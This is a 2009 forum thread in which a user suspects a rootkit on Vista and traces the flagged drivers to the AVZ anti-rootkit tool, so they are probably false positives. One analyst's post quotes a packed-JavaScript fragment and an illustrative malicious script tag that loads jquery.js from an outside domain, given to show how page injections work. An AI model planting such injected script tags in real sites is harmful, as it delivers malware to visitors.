I got Rooted in Vista !!!

Discussion in 'malware problems & news' started by StevieO, Jul 3, 2009.

Thread Status:
Not open for further replies.
  1. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Yes in Vista and with IE8 and UAC, just the other day !

    It all started so innocently. I Googled for a very well know carpet store hxxp://www.alliedcarpets.com/storelocator.aspx and clicked on the genuine link. ( Rmus kindly checked out the link and reported back that he didn't find/see anything dodgy ) Almost immediately after reaching there, Avira popped up with a Heuristic jscript warning.

    As it was Heuristic i thought it might be a FP, and clicked ignore. Yes i know lol. Nothing obvious or out of the ordinary appeared to be happening, and i continued viewing the site for only about a minute. Of course by that time it would be way to late ! Anyway i carried on surfing some regular safe sites, like here, and after about an hour i shut down the PC as i had to go out.

    When i came back and rebooted, i noticed the HD wasn't making the usual noises. The log on screen appeared and i logged on, in Admin as usual. As the desktop appeared i saw the taskbar looked faded compared to normal, and some of my Apps hadn't started, including ZoneAlarm. Also Avira had been disabled, and even worse was greyed out. I knew something wasn't right but what ?

    As i'm also using a router, i launched a browser and attempted to go online to see if i could. Didn't work, and looking at the routers Led's i saw problems there too. Oh dear !

    Went to do a System Restore, but they had ALL gone, now what ? As this PC ( Vista ) isn't mine i felt awful, especially as they would want to use it later on. I rebooted and went into SafeMode, with networking, still no sign of them, and stayed in SM. Launched IE and had no problems this time getting out through the Router to the web.

    I have a USB stick with lots of portable security Apps on it. So i plugged it in and updated MBAM, SAS and a2 then scanned in turn, but didn't delete yet as i wanted to see what they all found first. They all detected various things connected with a Bagle nasty and a Trojan. In the heat of the moment i can't have taken any a2 pics, or lost them !

    I located the nasties and uploaded the two .SYS to VT. Notice how the file names are different to what i Actually sent ?

    uzmwmzg5.sys = uzi4ndaz.sys

    utmwmzg5.sys = 11s11ro1s1a2sergio.sys

    perce.gif

    Deleted all the nasties.

    Also ran several other Apps afterwards such as, avz4, Autoruns, HJT, ADS Scanner Version 2.00, mbr v0.3.1 and some ARK's. GMER, Kernel Detective v1.2, RootRepeal v1.2.3.0. I didn't see anything unusual.

    In the end there turned out to be too much damage to try and waste time repairing. I reinstalled from the backup drive, and other places, and back now as good as new.

    The only other recent change made to this PC, was to install Skype yesterday. Only added 2 video contacts to test, which went very smoothly and worked fine first time. Having said that, even though i set it reject all but in the contacts, 2 unknown messages got through. How did they get in ? They were both from sex chat/contact sites lol. I copied the obsufcated links and pasted into IE to see, very enlightening. Still got them if you wanna have a look, for research purposes of course !

    Was it the furniture www Script, something received via Skpye or ? I don't know. But as the problems visibly appeared after the Avira warning and my reboot, i'm presuming it might have been the furniture www that has/had been compromised somehow. If so then my fault for ignoring the prompt from Avira.

    The strange thing though, is that in the VirusTotal scan Avira is a No show for this Bagle ? So i'm still not sure exactly where it came from.

    What an adventure !


    Sreenies to follow
     
  2. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    1st Screenies
     

    Attached Files:

  3. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    2nd lot

    ~VirusTotal screenshots removed~
     

    Attached Files:

    Last edited by a moderator: Jul 3, 2009
  4. kC_

    kC_ Registered Member

    Joined:
    Apr 6, 2007
    Posts:
    452
    you sound surprised? :argh:
     
  5. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Re the VT screenies that have been removed !

    utmwmzg5.sys = 11s11ro1s1a2sergio.sys was only detected by 18 out of 41

    uzmwmzg5.sys = uzi4ndaz.sys was a no detect by any.

    I should have originally added, VT stated both files had been scanned before and i clicked to show those results.

    @ kC, without the Sunshine band. Nice tunes !

    Yes and no ! Mostly yes.

    EDIT

    SAS must have been run in Safe Mode, as it's not a PA. Sorry for any confusion there.
     
  6. zopzop

    zopzop Registered Member

    Joined:
    Apr 6, 2006
    Posts:
    632
    @StevieO

    I can confirm that the link is clean. I went there and nothing out of the ordinary happened (a fully updated Avira was quiet). I think you got that rootkit elsewhere.
     
  7. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    It's a mystery !!!

    But the main thing is, look what they did to " MS's safest OS ever " as touted pre launch by Bill Gates and baldy ? And running the " safest IE ever " with no ActiveX, iframes etc enabled, and UAC.

    zopzop

    You just nudged me into going there again, and this time i didn't get the Alert i got before.

    So either it was a FP originally and Avira fixed it, or there was something but it got removed by the IT peeps ?

    If niether then, lord knows where that crap came from. I wasn't emailing, downloading anything etc etc.
     
  8. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Can u share the samples( just PM)? Thanks
     
  9. arran

    arran Registered Member

    Joined:
    Feb 5, 2008
    Posts:
    1,139
    can you me pm me the samples as well?
     
  10. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,794
    Location:
    Texas
    This isn't a malware trading forum. Take your messages private. Thanks.
     
  11. Wildest

    Wildest Registered Member

    Joined:
    Apr 28, 2009
    Posts:
    304
    Whoa!! :gack:

    Correct me if I am wrong, but does this imply that there is some value to Avira's WebGuard? o_O
    I have read many post here that WebGuard is just marketing gimmick but this seems to be proof to the contrary? o_O
     
  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Hi StevieO,

    The AV message with the Heuristic jscript warning for jquery.js could have been a false alert. Wepawet reports it as free from the normal stuff:

    The AV may have responded to the packed code, which is common in both legitimate and malicious javascript files (search for jquery for a description).

    Code:
    eval(function(p, a, c, k, e, r) { e = function(c) { return (c < a ? '' : e(parseInt(c / a)))
     + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/,
     String)) { while (c--) r[e(c)] = k[c]e(c); k = [function(e){ return r[e] } ]; e = function()
      return '\\w+' };c = 1 };while (c--) if (k[c])p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), 
    
    Usually an injected script on the main page will call out to a malicious server for a rigged javascript file. alliedcarpets.com loads jquery.js directly from its server:

    Code:
    script src="/Scripts/jquery.js"
    This would a typical malware injection:

    Code:
    script src="http://www.3ttgfor.com/jquery.js"
    As you say, it's possible that it has been cleaned up, but I checked yesterday when you notified me by PM. You didn't mention the alert for the jquery.js file so I didn't look at it at that time. Unless you had zipped all of the cached files immediately for later analysis, all at this point is speculation.

    In this case, how do you know it happened while viewing alliedcarpets.com? Did you check the file creation date/time for the files? That would tell you whether or not the malware installed on your watch!

    Regarding rootkit.bagle:

    Everything I've seen written about rootkit.bagle shows this malware to be delivered via e-mail messages, file-sharing networks, and downloader sites piggy-backing on something else. It's hard to imagine that this could have sneaked in as a drive-by download - Websense, f-secure, would be all over something like this.

    In tests, I've seen UAC effectively block anything from writing to a system directory. I don't see that this exploit goes anywhere on VISTA with UAC unless installation privileges were granted.

    Could this have happened when another user was on the computer?

    regards,

    rich
     
    Last edited: Jul 4, 2009
  13. innerpeace

    innerpeace Registered Member

    Joined:
    Jan 15, 2007
    Posts:
    2,095
    Location:
    Mountaineer Country
    StevieO, Is there any particular reason your running as Admin on your Vista system? If not, try setting your daily use account as User. I setup my sis's Vista rig like that and she hasn't had a problem so far.
     
  14. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Wildest

    Avira's WebGuard is far from any marketing gimmick. I've lost count on the amount of times it's detected real things on infected www's. Those were no FP's either. www's with verified nasties, and also ones that were later confirmed to be.

    Rmus

    Yes it could have been a packed code detect. I thought i'd mentioned i got a Heuristic jscript alert from Avira ? I didn't check the file creation date/time. Looks like this " exploit " didn't go anywhere on VISTA with UAC afterall. Thanx for posting the code etc.

    innerpeace

    I've run as Admin since 98SE days, and just prefer it, no noise. Never had any problems doing so.

    ----------

    Well guess what ?

    On further checking utmwmzg5.sys and utmwmzg5.sys look as if if they are connected with AVZ. In which case all those detects by the Apps i scanned with were and are FP's !

    So that leaves perce.gif that was detected, which i don't have now, but probably wasn't a nasty. And it was a .GIF as i have show extentions etc enabled.

    What does this all mean then ? Well either i was hit with some new unknown zero day nasty from i don't know where, or the PC went wibbly wobbly. Could have been a temp hardware issue i suppose, but i doubt it.

    Wish i knew what really happened. But ones things for sure, something/s did and then several Apps detected the same files as nasties. How wierd.
     

    Attached Files:

    • avz.png
      avz.png
      File size:
      18.7 KB
      Views:
      504
  15. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Out of curiosity i reversed the packer on the jquery.js script to check the plain source: http://pastebin.com/m7c0b3e24

    It mainly just deals with forms, layout data, browser compatibility etc. Something "could" of happened at the particular time you were on the site, but it's more than likely your problems stemmed from elsewhere.
     
  16. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    1boss1

    Thanx for doing that, and the info.
     
  17. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    utmwmzg5.sys Malware or what ?

    Latest results from a few hours ago -

    At least 17 vendors are seeing this file as Malware, for eg -

    RK Bagle, Trojan unknown, Trojan.Rootkit.Agent

    Now either it's a Major FP from all of them, or they are missing a Real serious threat. Whichever way it's not good.

    I still have this file if any vendors etc wish to test it.
     
  18. Windchild

    Windchild Registered Member

    Joined:
    Jun 16, 2009
    Posts:
    571
    You might want to send it in for analysis, then, to such vendors that detect it only heuristically or as "suspicious" or similar.

    One thing is sure, though. Any .sys file that resides in a user profile folder is inherently extremely suspicious. Basically, it is almost certainly one of two things: either it's malware, or it's part of some anti-malware/anti-rootkit/similar thing that probably wasn't programmed all that well and may be a hazard in itself even if it isn't malware.
     
  19. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Why u think them malware while they are shown to be part of AVZ?
     
  20. zopzop

    zopzop Registered Member

    Joined:
    Apr 6, 2006
    Posts:
    632
    Did anyone contact the maker(s) of AVZ and the various antivirus vendors to report this as a false positive?
     
  21. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Windchild

    Sending that file to ALL those vendors is i'm afraid unrealistic. If we were allowed to post online scan images on here then hopefully some/all the vendors would find out it's a FP, and fix it sooner or later.

    Uploading to VT/Jotti etc is a good way to reach all the vendors listed as the files get forwarded to them afterwards. But obviously they only respond to files they interpret as Malware. As it stands FP's such as this will always have to wait. Pity Jo average who gets alerted with FP's and deletes something/s critical etc !

    Yes it's an anti-malware/anti-rootkit .SYS file in AVZ.

    aigle

    Because of the initial above alert i got from Avira, which led me to scan locally with amongst others, MBAM/SAS. I then uploaded the detected files to VirusTotal & Jotti, and nearly half those vendors then detected Rootkit Bagle etc.

    zopzop

    I havn't contacted AVZ as yet, but will do. See above about contacting ALL the vendors.

    Thanx to everyone for your patience regarding this adventure, which i don't want to repeat any time soon !
     
Loading...
Thread Status:
Not open for further replies.